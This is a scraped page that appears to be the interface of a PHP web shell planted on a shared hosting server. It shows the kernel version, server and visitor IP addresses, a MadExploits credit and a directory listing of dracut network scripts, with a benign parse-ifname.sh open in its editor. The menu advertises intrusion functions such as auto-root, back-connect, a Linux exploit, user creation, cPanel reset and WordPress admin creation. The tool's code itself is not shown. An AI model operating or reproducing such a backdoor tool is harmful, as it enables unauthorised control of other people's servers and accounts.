Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
lib /
dracut /
modules.d /
35network-legacy /
[ HOME SHELL ]
Name
Size
Permission
Action
dhclient-script.sh
9.15
KB
-rwxr-xr-x
dhclient.conf
303
B
-rw-r--r--
ifup.sh
15.18
KB
-rwxr-xr-x
kill-dhclient.sh
252
B
-rwxr-xr-x
module-setup.sh
2.81
KB
-rwxr-xr-x
net-genrules.sh
4.01
KB
-rwxr-xr-x
parse-bond.sh
1.96
KB
-rwxr-xr-x
parse-bridge.sh
1.1
KB
-rwxr-xr-x
parse-ibft.sh
283
B
-rwxr-xr-x
parse-ifname.sh
552
B
-rwxr-xr-x
parse-ip-opts.sh
4.83
KB
-rwxr-xr-x
parse-team.sh
1.56
KB
-rwxr-xr-x
parse-vlan.sh
662
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : parse-ifname.sh
#!/bin/sh # # Format: # ifname=<interface>:<mac> # # Note letters in the macaddress must be lowercase! # # Examples: # ifname=eth0:4a:3f:4c:04:f8:d7 # # Note when using ifname= to get persistent interface names, you must specify # an ifname= argument for each interface used in an ip= or fcoe= argument # check if there are any ifname parameters if ! getarg ifname= >/dev/null ; then return fi command -v parse_ifname_opts >/dev/null || . /lib/net-lib.sh # Check ifname= lines for p in $(getargs ifname=); do parse_ifname_opts $p done
Close